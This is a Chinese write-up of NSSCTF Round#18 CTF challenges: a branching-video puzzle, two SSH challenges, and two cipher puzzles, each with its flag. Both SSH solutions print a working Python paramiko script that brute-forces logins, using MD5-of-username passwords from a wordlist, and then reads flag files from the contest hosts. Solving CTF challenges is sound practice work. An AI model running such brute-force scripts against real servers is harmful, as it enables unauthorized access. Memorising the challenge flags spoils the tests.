NSSCTF-Round#18-WP

文章发布时间:

最后更新时间:

页面浏览:加载中...

MISC:

温馨的酒吧

1.可以一个一个试

2.使用bilibili弹幕网视频下载器😀下载所有分支去查看

[NSSRound#18]温馨的酒吧\A_看看菜单\B_1SelectFrom_Flag

image-20240214213951408

[NSSRound#18]温馨的酒吧\C_沉默\B_好啊~\B_太菜了,打不动!!\A_\D_Web\C_放下比赛,安慰对象。

image-20240214214042769

[NSSRound#18]温馨的酒吧\B_谢队!我要向你发起决斗!\D_突然不想打了,快跑!\A_

image-20240214214132305

FLAG:NSSCTF{新年快乐_不要停下来啊_CTFer}

usersssssssss

看到docker的文件了(可以根据文件名称登录相应用户查看)

直接python脚本爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import hashlib
import paramiko

# 设置登录信息
hostname = 'node1.anna.nssctf.cn'
port = 28905

# 读取字典文件并提取用户名和密码
with open('wordlist.txt', 'r') as file:
for line in file:
username = line.strip()
password = hashlib.md5(username.encode('utf-8')).hexdigest()

# 建立SSH连接
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname, port, username, password)
# 执行ls命令并保存结果到文件
stdin, stdout, stderr = ssh.exec_command('cat /home/laminous/flag.txt')
result = stdout.readlines()
with open('ssh_results.txt', 'a') as output_file: # 使用'a'模式以追加方式打开文件
output_file.write(f"成功登录用户:{username}\n")
output_file.write("命令执行结果:\n")
for item in result:
output_file.write(item.strip() + '\n')
except paramiko.AuthenticationException:
print(f"登录失败,用户名:{username},密码:{password}")
ssh.close()

image-20240214213557123

FLAG:NSSCTF{0077824f-6eac-40ee-8cf0-47019da3d925}

usersssssssss_revenge

直接脚本爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import hashlib
import paramiko

# 设置登录信息
hostname = 'node2.anna.nssctf.cn'
port = 28499

# 读取字典文件并提取用户名和密码
with open('wordlist.txt', 'r') as file:
for line in file:
username = line.strip()
password = hashlib.md5(username.encode('utf-8')).hexdigest()

# 建立SSH连接
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname, port, username, password)
# 执行ls命令并保存结果到文件
stdin, stdout, stderr = ssh.exec_command('grep -r --include=*.txt "NSSCTF" /')
result = stdout.readlines()
with open('ssh_results.txt', 'a') as output_file: # 使用'a'模式以追加方式打开文件
output_file.write(f"成功登录用户:{username}\n")
output_file.write("命令执行结果:\n")
for item in result:
output_file.write(item.strip() + '\n')
except paramiko.AuthenticationException:
print(f"登录失败,用户名:{username},密码:{password}")
ssh.close()

image-20240214213628142

FLAG:NSSCTF{51b40507-a867-4f07-b798-3b0fff186a33}

Number 7(赛后难绷)

题目:

1
2
Inside No.9 or Inside No.7 ?
182A1918071C152E0A4737263A3E780A6F6A075A112742777C687D0700773F7D39560063487D

随波逐流5.2直出

image-20240214213347052

FLAG:NSSCTF{H4PPY_N3WY34r_4ND_N55CTF_18TH}

CRYPTO:

过年来下棋

推测是棋盘密码,根据题目lucky试了一下就出来了

新年快乐呀!来一起下象棋吧!我都摆好咯~ 祝愿大家在新的一年里 lucky!flag格式:NSSCTF{字母小写}

image-20240214133345719

FLAG:NSSCTF{h499yn3wye4r}